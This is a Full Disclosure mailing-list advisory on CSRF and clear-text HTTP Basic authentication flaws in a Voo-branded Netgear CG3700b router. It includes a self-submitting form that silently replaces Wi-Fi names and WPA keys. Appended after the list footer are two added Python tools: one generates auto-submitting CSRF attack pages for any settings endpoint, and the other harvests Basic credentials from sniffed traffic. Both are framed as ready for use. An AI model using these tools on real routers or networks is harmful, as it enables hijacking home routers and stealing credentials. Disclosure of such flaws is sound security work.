Open Source and information security mailing list archives
Message-ID: <4c59417ffd9ce684bc2f6f80f7d3521c.squirrel@email.fatcow.com>
Date: Tue, 26 Apr 2016 07:10:35 -0400
From: dev@...ler.net
To: fulldisclosure@...lists.org
Subject: [FD] Multiple Vulnerabilities in Voo branded Netgear CG3700b

CVEs pending, screenshots and further examples available soon on my site.

Cross-Site Request Forgery (CSRF) on all form POSTs
---------------------------------------------------------------------------------

The Voo branded Netgear CG3700b custom firmware (newest version, V2.02.03) allows a (context-dependent) attacker to perform a Cross-Site Request Forgery (CSRF) attack against every configuration-setting page POST request (/goform/<settingspage>). The handlers accept a POST carrying nothing more than the form fields, with no anti-CSRF token, so a request forged from any site the victim visits is processed as if the victim had submitted it. Because the device authenticates with HTTP Basic authentication (see the next section), a browser that has logged in to the admin interface attaches the cached credentials to the forged request automatically. By tricking a user into following a specially crafted link, an attacker can modify all settings including WEP/WPA/WPA2 keys, restore the router to factory settings, or even upload an entire malicious configuration file.

Example (a page that, when opened by a user whose browser is logged in to the router, silently replaces the SSIDs and WPA keys of both radios; the form submits itself, so no click is needed):

    <html>
    <body>
    <form method="POST" name="form0" action="http://192.168.0.1/goform/index">
    <input type="hidden" name="group_parametrage_wifi" value="active">
    <input type="hidden" name="reseau_wifi_name" value="NEWSSID">
    <input type="hidden" name="nom_select" value="AUTO-PSK">
    <input type="hidden" name="canal" value="0">
    <input type="hidden" name="mot_de_passe" value="NEWWPAKEY">
    <input type="hidden" name="NBandwidth" value="20">
    <input type="hidden" name="group_parametrage_wifi_an" value="active">
    <input type="hidden" name="reseau_wifi_name_an" value="NEWSSID-5G">
    <input type="hidden" name="nom_select_an" value="AUTO-PSK">
    <input type="hidden" name="canal_an" value="0">
    <input type="hidden" name="mot_de_passe_an" value="NEWWPAKEY-5G">
    <input type="hidden" name="NBandwidth_an" value="20">
    <input type="hidden" name="group_fon" value="desactiver">
    <input type="hidden" name="buttonApply" value="1">
    <input type="hidden" name="only_mode" value="0">
    <input type="hidden" name="selected_ch_an" value="1">
    </form>
    <!-- submit automatically so the victim only has to load the page -->
    <script>document.form0.submit();</script>
    </body>
    </html>

Insufficient Authentication (OWASP-A2)
-----------------------------------------------------------
This same modem handles authentication via HTTP Basic authentication over the default connection, which is plain HTTP with no TLS. Basic authentication only base64-encodes the username and password; it does not encrypt them, so anyone who can capture the clear-text traffic can decode the Authorization header and authenticate to the router. This only requires that the attacker be on the same network as the router and sniff the traffic.

Example (captured request, followed by decoding the Authorization header):

    POST http://192.168.0.1/goform/parametre_config HTTP/1.1
    Host: 192.168.0.1
    Connection: keep-alive
    Content-Length: 24721
    Cache-Control: max-age=0
    Authorization: Basic dm9vOlBBU1NXT1JE

    root@...i:~# cat voo.txt
    dm9vOlBBU1NXT1JE
    root@...i:~# base64 --decode voo.txt
    voo:PASSWORD

Disclosure Timeline
-----------------------------

22 Jan - discovered vulnerability, initially notified vendor
23 Jan - requested CVE
7 Mar - contacted vendor again, was notified that this will not be fixed at this time
20 April - attempted to contact Mitre again to receive CVE
21 April - sent to Full Disclosure
23 April - additional information (tentatively) posted to http://www.doyler.net
26 April - resending to Full Disclosure due to some errors

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
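Added example for the CSRF section of the advisory above. This is not code from the advisory or from Netgear/Voo; it generalizes the hand-written form in the post to any /goform/<settingspage> handler by building a self-submitting page from a parameter dict. The endpoint path and field names are taken from the advisory; the router base URL, the placeholder SSIDs and keys, and the helper names are assumptions for illustration. The one thing the hand-written form does not show is escaping: a value containing a quote or angle bracket is HTML-escaped so it stays inside the attribute instead of breaking the PoC.

```python
"""Build a self-submitting CSRF proof-of-concept page for a router
configuration endpoint that accepts plain, token-less form POSTs."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin

# Assumed router address (the advisory uses 192.168.0.1).
ROUTER_BASE = "http://192.168.0.1/"

# Field names are those of the advisory's /goform/index form; the SSID and
# key values are constructed placeholders.
WIFI_PARAMS = {
    "group_parametrage_wifi": "active",
    "reseau_wifi_name": "NEWSSID",
    "nom_select": "AUTO-PSK",
    "canal": "0",
    "mot_de_passe": "NEWWPAKEY",
    "NBandwidth": "20",
    "group_parametrage_wifi_an": "active",
    "reseau_wifi_name_an": "NEWSSID-5G",
    "nom_select_an": "AUTO-PSK",
    "canal_an": "0",
    "mot_de_passe_an": "NEWWPAKEY-5G",
    "NBandwidth_an": "20",
    "group_fon": "desactiver",
    "buttonApply": "1",
    "only_mode": "0",
    "selected_ch_an": "1",
}


def build_csrf_poc(settings_page, params, base=ROUTER_BASE):
    """Return an HTML page that POSTs `params` to /goform/<settings_page>
    as soon as the victim's browser renders it.

    Names and values are escaped with quote=True, so a value such as
    "><script>  lands inside the attribute rather than closing it.
    """
    action = urljoin(base, "goform/" + settings_page.lstrip("/"))
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (escape(str(k), quote=True), escape(str(v), quote=True))
        for k, v in params.items()
    )
    return (
        "<!doctype html>\n<html><body>\n"
        '  <form method="POST" name="form0" action="%s">\n' % escape(action, quote=True)
        + inputs + "\n"
        "  </form>\n"
        # No button: the script submits the form on load, so the victim
        # only has to open the page.
        "  <script>document.forms.form0.submit();</script>\n"
        "</body></html>\n"
    )


class _HiddenInputs(HTMLParser):
    """Collects name -> value of every hidden input in a page."""

    def __init__(self):
        super().__init__()
        self.found = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.found[a["name"]] = a["value"]


def hidden_inputs(html):
    """Parse the hidden inputs back out of a generated page, so the PoC
    can be checked before use (e.g. that escaping round-trips)."""
    p = _HiddenInputs()
    p.feed(html)
    return p.found


if __name__ == "__main__":
    print(build_csrf_poc("index", WIFI_PARAMS))
```

Writing the returned string to a file and hosting it anywhere the victim will browse is all the attack needs; `hidden_inputs` exists to confirm that what the browser will send matches the intended parameters, including values with awkward characters.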
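Added example for the Insufficient Authentication section of the advisory above, not code from the advisory itself: it automates the `base64 --decode` step over a whole capture of clear-text HTTP requests, pulling out every Basic credential. The capture is constructed for illustration (the first request mirrors the advisory's example, the others are made up), and the helper names are assumptions. It also handles the two details a one-off decode skips: only the first colon separates user from password (a colon in the password is legal), and non-Basic schemes or malformed tokens are ignored rather than crashing the scan.

```python
"""Harvest HTTP Basic credentials from a capture of clear-text requests."""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

# Constructed capture: the first request is the advisory's example, the
# second uses a non-Basic scheme, the third has a colon in the password.
CAPTURE = b"""POST http://192.168.0.1/goform/parametre_config HTTP/1.1\r
Host: 192.168.0.1\r
Connection: keep-alive\r
Authorization: Basic dm9vOlBBU1NXT1JE\r
Content-Length: 0\r
\r
GET /index.htm HTTP/1.1\r
Host: 192.168.0.1\r
Authorization: Bearer not-basic-at-all\r
\r
GET /goform/index HTTP/1.1\r
Host: 192.168.0.1\r
authorization: basic YWRtaW46cGE6c3M=\r
\r
"""

# Header names are case-insensitive; the token is a single base64 word.
AUTH_RE = re.compile(
    rb"^authorization:\s*basic\s+([A-Za-z0-9+/=]+)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def decode_basic(token: str) -> Optional[Tuple[str, str]]:
    """Decode one Basic token to (user, password).

    Splits on the FIRST colon only: a password may itself contain colons,
    so 'admin:pa:ss' must give ('admin', 'pa:ss').  Returns None for
    malformed base64 or a decoded string without a colon.
    """
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    if ":" not in raw:
        return None
    user, _, password = raw.partition(":")
    return user, password


def harvest_credentials(capture: bytes) -> List[Dict[str, str]]:
    """Walk raw HTTP requests and return every Basic credential found,
    together with the request line it was sent on."""
    found = []
    # Each header block ends at a blank line.  A request body (the
    # advisory's POST carries 24 KB of config) simply becomes a chunk
    # with no Authorization header and is skipped.
    for chunk in re.split(rb"\r?\n\r?\n", capture):
        lines = chunk.split(b"\n")
        if not lines[0].strip():
            continue
        request_line = lines[0].strip().decode("latin-1")
        for m in AUTH_RE.finditer(chunk):
            creds = decode_basic(m.group(1).decode("ascii"))
            if creds is not None:
                found.append(
                    {"request": request_line, "user": creds[0], "password": creds[1]}
                )
    return found


if __name__ == "__main__":
    for c in harvest_credentials(CAPTURE):
        print("%s -> %s:%s" % (c["request"], c["user"], c["password"]))
```

Feed it the reassembled TCP payload of a sniffed session (for instance exported from a packet capture) and it lists each credential with the request it rode on; the same check can be run over your own traffic captures to confirm whether any device on the LAN is still sending Basic credentials over plain HTTP.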